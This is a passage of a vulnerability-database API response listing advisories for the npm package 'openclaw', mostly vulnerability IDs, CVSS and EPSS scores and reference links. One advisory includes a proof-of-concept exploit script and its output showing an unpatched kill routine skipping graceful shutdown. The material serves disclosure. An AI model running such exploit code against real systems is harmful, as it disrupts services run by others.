                            "vulnerability": "VCID-2uqu-k42d-1baq"
                        },
                        {
                            "vulnerability": "VCID-2wr9-h42m-a7ev"
                        },
                        {
                            "vulnerability": "VCID-356u-h788-pkgt"
                        },
                        {
                            "vulnerability": "VCID-38g8-39ek-xbat"
                        },
                        {
                            "vulnerability": "VCID-3wsw-d4z2-dydt"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-3zwq-dz2u-pqgv"
                        },
                        {
                            "vulnerability": "VCID-3zx4-t8cj-kbfn"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4hz5-f2pw-3yb4"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-4urc-4536-pqhk"
                        },
                        {
                            "vulnerability": "VCID-5rgx-2krs-guck"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-733f-57ds-xugm"
                        },
                        {
                            "vulnerability": "VCID-73cz-n29z-uqem"
                        },
                        {
                            "vulnerability": "VCID-75yr-sbce-nkah"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-7dyw-9b37-yqh4"
                        },
                        {
                            "vulnerability": "VCID-7ntr-5dr5-9uf8"
                        },
                        {
                            "vulnerability": "VCID-7snr-fn3u-x3b8"
                        },
                        {
                            "vulnerability": "VCID-7wmr-v7zb-6fc9"
                        },
                        {
                            "vulnerability": "VCID-7z2s-k6ty-ekg1"
                        },
                        {
                            "vulnerability": "VCID-96jd-x87b-s3ey"
                        },
                        {
                            "vulnerability": "VCID-9hcd-uj62-8yeu"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-9xgq-vtg2-jucq"
                        },
                        {
                            "vulnerability": "VCID-9xrt-mv81-3yc8"
                        },
                        {
                            "vulnerability": "VCID-a2wx-7b8h-c3h1"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-arks-g6hw-abbw"
                        },
                        {
                            "vulnerability": "VCID-axp9-mt9z-gkgw"
                        },
                        {
                            "vulnerability": "VCID-b9w3-w2nq-cqg6"
                        },
                        {
                            "vulnerability": "VCID-bgwh-spue-yybk"
                        },
                        {
                            "vulnerability": "VCID-bkya-73v8-bber"
                        },
                        {
                            "vulnerability": "VCID-c25h-khws-2fc3"
                        },
                        {
                            "vulnerability": "VCID-c4yt-z48z-zygv"
                        },
                        {
                            "vulnerability": "VCID-c76v-4577-n7c6"
                        },
                        {
                            "vulnerability": "VCID-carm-gpgh-wbbf"
                        },
                        {
                            "vulnerability": "VCID-cbuu-4d6c-rben"
                        },
                        {
                            "vulnerability": "VCID-cvmw-sxfq-dyhz"
                        },
                        {
                            "vulnerability": "VCID-d8v2-gft5-buee"
                        },
                        {
                            "vulnerability": "VCID-da47-zdf1-mfgf"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-dmse-bb22-rkcj"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-e4ac-qm17-qbf5"
                        },
                        {
                            "vulnerability": "VCID-fekn-d6f3-xfa6"
                        },
                        {
                            "vulnerability": "VCID-fuda-zxu8-gbb4"
                        },
                        {
                            "vulnerability": "VCID-g3hg-peh1-tudm"
                        },
                        {
                            "vulnerability": "VCID-g8r6-x6s5-uydq"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-haxd-ps1x-h3ch"
                        },
                        {
                            "vulnerability": "VCID-hd4w-s3dp-nubj"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-j8fb-fhyc-33fu"
                        },
                        {
                            "vulnerability": "VCID-jdqk-kv8u-xqa9"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kxmf-d7w1-xfcv"
                        },
                        {
                            "vulnerability": "VCID-kzgh-7f6h-kfd1"
                        },
                        {
                            "vulnerability": "VCID-ma62-gtan-97au"
                        },
                        {
                            "vulnerability": "VCID-mcz5-wgu1-z7g7"
                        },
                        {
                            "vulnerability": "VCID-mszk-dr24-xugw"
                        },
                        {
                            "vulnerability": "VCID-mv8b-cryt-u3g8"
                        },
                        {
                            "vulnerability": "VCID-mxu5-yjqs-nuap"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-ns77-4wfj-9ka6"
                        },
                        {
                            "vulnerability": "VCID-ntwt-jkgr-sffu"
                        },
                        {
                            "vulnerability": "VCID-nv6g-7gs9-pfan"
                        },
                        {
                            "vulnerability": "VCID-nw4r-wjgs-8qc1"
                        },
                        {
                            "vulnerability": "VCID-p7gx-9usz-yyew"
                        },
                        {
                            "vulnerability": "VCID-p7me-4bzz-83cm"
                        },
                        {
                            "vulnerability": "VCID-p7v5-jqhq-nbhz"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-pae5-uyu7-k3c1"
                        },
                        {
                            "vulnerability": "VCID-pdmd-a4fg-8fcg"
                        },
                        {
                            "vulnerability": "VCID-psms-gauf-tkbz"
                        },
                        {
                            "vulnerability": "VCID-q6ne-sw1r-xkd1"
                        },
                        {
                            "vulnerability": "VCID-q9jf-srt4-fbcg"
                        },
                        {
                            "vulnerability": "VCID-qedr-a3ay-v3gx"
                        },
                        {
                            "vulnerability": "VCID-qjss-tvgk-3ubk"
                        },
                        {
                            "vulnerability": "VCID-r5bw-c2py-9udf"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-s3wz-3yzf-ybhz"
                        },
                        {
                            "vulnerability": "VCID-sja9-6t41-hud8"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-t991-75e7-ykdv"
                        },
                        {
                            "vulnerability": "VCID-una1-gxkk-t3bp"
                        },
                        {
                            "vulnerability": "VCID-uy97-p1ex-y7df"
                        },
                        {
                            "vulnerability": "VCID-v9cd-65tf-p3f8"
                        },
                        {
                            "vulnerability": "VCID-vfbb-bpy9-87ey"
                        },
                        {
                            "vulnerability": "VCID-vktg-77tu-vycv"
                        },
                        {
                            "vulnerability": "VCID-vx5d-3d98-7kf3"
                        },
                        {
                            "vulnerability": "VCID-vy8v-np82-r3b5"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2tj-nqa6-cuam"
                        },
                        {
                            "vulnerability": "VCID-w4p1-sxdg-hyha"
                        },
                        {
                            "vulnerability": "VCID-w58d-6veg-uugy"
                        },
                        {
                            "vulnerability": "VCID-watb-49vx-yub1"
                        },
                        {
                            "vulnerability": "VCID-wmr3-83u3-6qdb"
                        },
                        {
                            "vulnerability": "VCID-wx44-n3fr-skah"
                        },
                        {
                            "vulnerability": "VCID-wyce-qxau-mqff"
                        },
                        {
                            "vulnerability": "VCID-x2ru-ydpv-f3ah"
                        },
                        {
                            "vulnerability": "VCID-x4hn-ygbg-mkep"
                        },
                        {
                            "vulnerability": "VCID-x794-wfnf-1ugf"
                        },
                        {
                            "vulnerability": "VCID-x7uw-s9a6-fybd"
                        },
                        {
                            "vulnerability": "VCID-xfgw-ua7r-abbr"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xnvm-rp36-vyaj"
                        },
                        {
                            "vulnerability": "VCID-xryt-a83q-q7et"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-xvhd-w4tv-tqhr"
                        },
                        {
                            "vulnerability": "VCID-xz8s-hj5s-wfgj"
                        },
                        {
                            "vulnerability": "VCID-xzg5-ren5-p7gw"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-y7sd-j9xn-qffs"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ykwt-tdpa-3bft"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        },
                        {
                            "vulnerability": "VCID-ynup-4v9e-tbh4"
                        },
                        {
                            "vulnerability": "VCID-yp2w-pc58-9bf6"
                        },
                        {
                            "vulnerability": "VCID-ywrn-52gx-f3ad"
                        },
                        {
                            "vulnerability": "VCID-z7wa-tw2t-vqas"
                        },
                        {
                            "vulnerability": "VCID-z8mj-pnbe-wqej"
                        },
                        {
                            "vulnerability": "VCID-zb5t-hhkm-kfeh"
                        },
                        {
                            "vulnerability": "VCID-zg68-u5b5-vkft"
                        },
                        {
                            "vulnerability": "VCID-zkum-rn42-yyfs"
                        },
                        {
                            "vulnerability": "VCID-zpte-tgt5-wqcm"
                        },
                        {
                            "vulnerability": "VCID-zu4s-jnn3-1kd8"
                        },
                        {
                            "vulnerability": "VCID-zunq-wnnf-k3fw"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.28"
                }
            ],
            "aliases": [
                "GHSA-jp4j-q5fc-58gv"
            ],
            "risk_score": 3.1,
            "exploitability": "0.5",
            "weighted_severity": "6.2",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-csnc-r6fv-j3en"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/90131?format=api",
            "vulnerability_id": "VCID-cvmw-sxfq-dyhz",
            "summary": "OpenClaw: Pairing pending-request caps were enforced per channel instead of per account\n## Summary\n\nBefore OpenClaw 2026.3.31, pending pairing-request caps were enforced per channel file instead of per account. On multi-account channel setups, requests from other accounts could fill the shared pending window and block new pairing challenges on an unaffected account.\n\n## Impact\n\nThis issue could deny new pairing or onboarding on another account until an existing request was approved or expired. It was an availability-only bug; it did not allow cross-account approval, data access, or authorization bypass.\n\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `>= 2026.2.26, < 2026.3.31`\n- Patched versions: `>= 2026.3.31`\n- Latest published npm version: `2026.4.1`\n\n## Fix Commit(s)\n\n- `9bc1f896c8cd325dd4761681e9bdb8c425f69785` — scope pending request caps per account\n\n## Release Process Note\n\nThe fix shipped in OpenClaw `2026.3.31` on March 31, 2026. The current published npm release `2026.4.1` from April 1, 2026 also contains the fix.\n\nThanks @smaeljaish771 for reporting.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41346",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00169",
                            "scoring_system": "epss",
                            "scoring_elements": "0.37899",
                            "published_at": "2026-06-05T12:55:00Z"
                        },
                        {
                            "value": "0.00169",
                            "scoring_system": "epss",
                            "scoring_elements": "0.3787",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.00169",
                            "scoring_system": "epss",
                            "scoring_elements": "0.37901",
                            "published_at": "2026-06-06T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41346"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"
                        },
                        {
                            "value": "6.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/9bc1f896c8cd325dd4761681e9bdb8c425f69785",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"
                        },
                        {
                            "value": "6.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-24T16:38:52Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/9bc1f896c8cd325dd4761681e9bdb8c425f69785"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-wwfp-w96m-c6x8",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "6.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-24T16:38:52Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-wwfp-w96m-c6x8"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41346",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"
                        },
                        {
                            "value": "6.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41346"
                },
                {
                    "reference_url": "https://www.vulncheck.com/advisories/openclaw-denial-of-service-via-improper-pending-pairing-request-cap-enforcement",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"
                        },
                        {
                            "value": "6.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-24T16:38:52Z/"
                        }
                    ],
                    "url": "https://www.vulncheck.com/advisories/openclaw-denial-of-service-via-improper-pending-pairing-request-cap-enforcement"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-wwfp-w96m-c6x8",
                    "reference_id": "GHSA-wwfp-w96m-c6x8",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-wwfp-w96m-c6x8"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109907?format=api",
                    "purl": "pkg:npm/openclaw@2026.3.31",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-1pbz-8rnx-dkhe"
                        },
                        {
                            "vulnerability": "VCID-258k-a4dw-tfae"
                        },
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2h6a-becf-x7ej"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-356u-h788-pkgt"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-3zwq-dz2u-pqgv"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-4urc-4536-pqhk"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-733f-57ds-xugm"
                        },
                        {
                            "vulnerability": "VCID-73cz-n29z-uqem"
                        },
                        {
                            "vulnerability": "VCID-75yr-sbce-nkah"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-7ntr-5dr5-9uf8"
                        },
                        {
                            "vulnerability": "VCID-7snr-fn3u-x3b8"
                        },
                        {
                            "vulnerability": "VCID-7z2s-k6ty-ekg1"
                        },
                        {
                            "vulnerability": "VCID-96jd-x87b-s3ey"
                        },
                        {
                            "vulnerability": "VCID-9hcd-uj62-8yeu"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-9xgq-vtg2-jucq"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-arks-g6hw-abbw"
                        },
                        {
                            "vulnerability": "VCID-bgwh-spue-yybk"
                        },
                        {
                            "vulnerability": "VCID-bkya-73v8-bber"
                        },
                        {
                            "vulnerability": "VCID-c25h-khws-2fc3"
                        },
                        {
                            "vulnerability": "VCID-cbuu-4d6c-rben"
                        },
                        {
                            "vulnerability": "VCID-d8v2-gft5-buee"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-dmse-bb22-rkcj"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-e4ac-qm17-qbf5"
                        },
                        {
                            "vulnerability": "VCID-fuda-zxu8-gbb4"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-haxd-ps1x-h3ch"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kxmf-d7w1-xfcv"
                        },
                        {
                            "vulnerability": "VCID-ma62-gtan-97au"
                        },
                        {
                            "vulnerability": "VCID-mszk-dr24-xugw"
                        },
                        {
                            "vulnerability": "VCID-mv8b-cryt-u3g8"
                        },
                        {
                            "vulnerability": "VCID-mxu5-yjqs-nuap"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-ns77-4wfj-9ka6"
                        },
                        {
                            "vulnerability": "VCID-ntwt-jkgr-sffu"
                        },
                        {
                            "vulnerability": "VCID-nv6g-7gs9-pfan"
                        },
                        {
                            "vulnerability": "VCID-nw4r-wjgs-8qc1"
                        },
                        {
                            "vulnerability": "VCID-p7gx-9usz-yyew"
                        },
                        {
                            "vulnerability": "VCID-p7v5-jqhq-nbhz"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-pae5-uyu7-k3c1"
                        },
                        {
                            "vulnerability": "VCID-pdmd-a4fg-8fcg"
                        },
                        {
                            "vulnerability": "VCID-pj41-sunw-vbcj"
                        },
                        {
                            "vulnerability": "VCID-psms-gauf-tkbz"
                        },
                        {
                            "vulnerability": "VCID-q6ne-sw1r-xkd1"
                        },
                        {
                            "vulnerability": "VCID-qedr-a3ay-v3gx"
                        },
                        {
                            "vulnerability": "VCID-qjss-tvgk-3ubk"
                        },
                        {
                            "vulnerability": "VCID-r5bw-c2py-9udf"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-una1-gxkk-t3bp"
                        },
                        {
                            "vulnerability": "VCID-v9cd-65tf-p3f8"
                        },
                        {
                            "vulnerability": "VCID-vfbb-bpy9-87ey"
                        },
                        {
                            "vulnerability": "VCID-vy8v-np82-r3b5"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2tj-nqa6-cuam"
                        },
                        {
                            "vulnerability": "VCID-w4p1-sxdg-hyha"
                        },
                        {
                            "vulnerability": "VCID-w58d-6veg-uugy"
                        },
                        {
                            "vulnerability": "VCID-wmr3-83u3-6qdb"
                        },
                        {
                            "vulnerability": "VCID-wyce-qxau-mqff"
                        },
                        {
                            "vulnerability": "VCID-x2ru-ydpv-f3ah"
                        },
                        {
                            "vulnerability": "VCID-xfgw-ua7r-abbr"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xnvm-rp36-vyaj"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-y7sd-j9xn-qffs"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        },
                        {
                            "vulnerability": "VCID-z8mj-pnbe-wqej"
                        },
                        {
                            "vulnerability": "VCID-zg68-u5b5-vkft"
                        },
                        {
                            "vulnerability": "VCID-zpte-tgt5-wqcm"
                        },
                        {
                            "vulnerability": "VCID-zu4s-jnn3-1kd8"
                        },
                        {
                            "vulnerability": "VCID-zunq-wnnf-k3fw"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31"
                }
            ],
            "aliases": [
                "CVE-2026-41346",
                "GHSA-wwfp-w96m-c6x8"
            ],
            "risk_score": 3.1,
            "exploitability": "0.5",
            "weighted_severity": "6.2",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-cvmw-sxfq-dyhz"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/90875?format=api",
            "vulnerability_id": "VCID-cvxu-rdbu-abd2",
            "summary": "OpenClaw has incomplete Fix for CVE-2026-27486: Unvalidated SIGKILL in `!stop` Chat Command via `shell-utils.ts`\n> Fixed in OpenClaw 2026.3.24, the current shipping release.\n\n### Advisory Details\n**Title**: Incomplete Fix for CVE-2026-27486: Unvalidated SIGKILL in `!stop` Chat Command via `shell-utils.ts`\n\n**Description**:\n### Summary\nThe `!stop` (and `/bash stop`) chat command kills background bash processes using `SIGKILL` directly, without first sending `SIGTERM` to allow graceful shutdown. This is because `bash-command.ts` imports `killProcessTree()` from `src/agents/shell-utils.ts`, which still contains the pre-CVE-2026-27486 aggressive kill logic, rather than from the patched `src/process/kill-tree.ts`.\n\n### Details\nCVE-2026-27486 fixed unsafe process termination by introducing a graceful shutdown sequence in `src/process/kill-tree.ts` — sending `SIGTERM` first, waiting a configurable grace period (default 3 seconds), then escalating to `SIGKILL` only if the process is still alive.\n\nHowever, an identical copy of the **unpatched** `killProcessTree` function remains in `src/agents/shell-utils.ts` (lines 170–192). This function sends `SIGKILL` immediately with no `SIGTERM`:\n\n```typescript\n// src/agents/shell-utils.ts:170-192\nexport function killProcessTree(pid: number): void {\n  // ... Windows handling ...\n  try {\n    process.kill(-pid, \"SIGKILL\"); // Immediate hard kill, no SIGTERM\n  } catch {\n    try {\n      process.kill(pid, \"SIGKILL\");\n    } catch {\n      // process already dead\n    }\n  }\n}\n```\n\nThe `!stop` chat command handler in `src/auto-reply/reply/bash-command.ts` imports and calls this vulnerable version at line 302:\n\n```typescript\n// src/auto-reply/reply/bash-command.ts:5\nimport { killProcessTree } from \"../../agents/shell-utils.js\";\n\n// src/auto-reply/reply/bash-command.ts:300-304\nconst pid = running.pid ?? 
running.child?.pid;\nif (pid) {\n  killProcessTree(pid);  // Calls the UNPATCHED version\n}\nmarkExited(running, null, \"SIGKILL\", \"failed\");\n```\n\nCompare this to the patched version in `src/process/kill-tree.ts`:\n\n```typescript\n// src/process/kill-tree.ts:46-78\nfunction killProcessTreeUnix(pid: number, graceMs: number): void {\n  // Step 1: Try graceful SIGTERM to process group\n  try {\n    process.kill(-pid, \"SIGTERM\");\n  } catch { /* ... */ }\n\n  // Step 2: Wait grace period, then SIGKILL if still alive\n  setTimeout(() => {\n    if (isProcessAlive(-pid)) {\n      try { process.kill(-pid, \"SIGKILL\"); } catch { /* ... */ }\n    }\n  }, graceMs).unref();\n}\n```\n\n### PoC\n\nThis PoC demonstrates the difference between the vulnerable and patched code paths inside a running OpenClaw Gateway container.\n\n**Setup:**\n```bash\n# Build and start the gateway container\ncd CVE-2026-27486-variant-exp/\ndocker compose up -d\nsleep 5\n```\n\n**Exploit (vulnerable `killProcessTree` from `shell-utils.ts`):**\n\nThe following script is injected into the container and executed. 
It starts a bash process that traps `SIGTERM` for graceful shutdown, then kills it using the same code path as `!stop`:\n\n```javascript\n// exploit_sigkill.cjs — replicates src/agents/shell-utils.ts:183-190\nconst { spawn } = require('child_process');\nconst fs = require('fs');\n\ntry { fs.unlinkSync('/tmp/graceful_shutdown.txt'); } catch {}\n\nconst child = spawn('/bin/bash', ['-c',\n  'trap \\'echo GRACEFUL_SHUTDOWN > /tmp/graceful_shutdown.txt; exit 0\\' SIGTERM; while true; do sleep 1; done'\n], { detached: true, stdio: 'ignore' });\nchild.unref();\n\nsetTimeout(() => {\n  // VULNERABLE: same as shell-utils.ts — SIGKILL only\n  try { process.kill(-child.pid, 'SIGKILL'); } catch {\n    try { process.kill(child.pid, 'SIGKILL'); } catch {}\n  }\n  setTimeout(() => {\n    if (fs.existsSync('/tmp/graceful_shutdown.txt')) {\n      console.log('[BLOCKED] SIGTERM was received.');\n      process.exit(1);\n    } else {\n      console.log('[EXPLOITED] SIGKILL sent directly — SIGTERM never delivered.');\n      process.exit(0);\n    }\n  }, 2000);\n}, 1000);\n```\n\n**Run:**\n```bash\npython3 poc_exploit.py\n```\n\n### Log of Evidence\n\n**Exploit output (SIGKILL only, no graceful shutdown):**\n```\n[*] Running exploit (vulnerable killProcessTree from shell-utils.ts)...\n[*] Victim PID: 78\n[*] Calling vulnerable killProcessTree (SIGKILL only, no SIGTERM)...\n[EXPLOITED] SIGKILL sent directly — SIGTERM never delivered.\n[EXPLOITED] Graceful shutdown handler was NEVER invoked.\n\n[SUCCESS] CVE-2026-27486 variant confirmed:\n  killProcessTree() in shell-utils.ts sends immediate SIGKILL,\n  bypassing the graceful shutdown fix in process/kill-tree.ts.\n```\n\n**Control output (SIGTERM first, graceful shutdown works):**\n```\n[*] Running control (patched killProcessTree from process/kill-tree.ts)...\n[*] Victim PID: 93\n[*] Calling patched killProcessTree (SIGTERM first, then SIGKILL after grace)...\n[NORMAL] SIGTERM received — graceful shutdown completed. 
